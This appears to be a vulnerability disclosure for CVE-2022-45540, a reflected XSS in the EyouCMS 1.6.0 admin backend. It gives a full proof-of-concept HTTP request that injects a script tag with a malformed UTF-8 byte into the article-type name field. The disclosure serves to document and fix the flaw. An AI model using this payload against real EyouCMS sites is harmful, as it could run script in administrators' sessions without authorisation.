0%

EyouCMS V1.6.0 Backend Reflected XSS (CVE-2022-45540)

Description

Backend article type adding with reflected-XSS in the post value name when the value contains malformed UTF-8 chars, this xss payload will be showed in error reporting message.

Affected Version

EyouCMS <= 1.6.0-UTF8-SP1

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

channel_id=-99&remark=af&dfvalue=&dtype=text&name=<script>alert(1)</script>%C0aef&title=aef

Reference

Reported by Srpopty, vulnerability discovered by using Corax.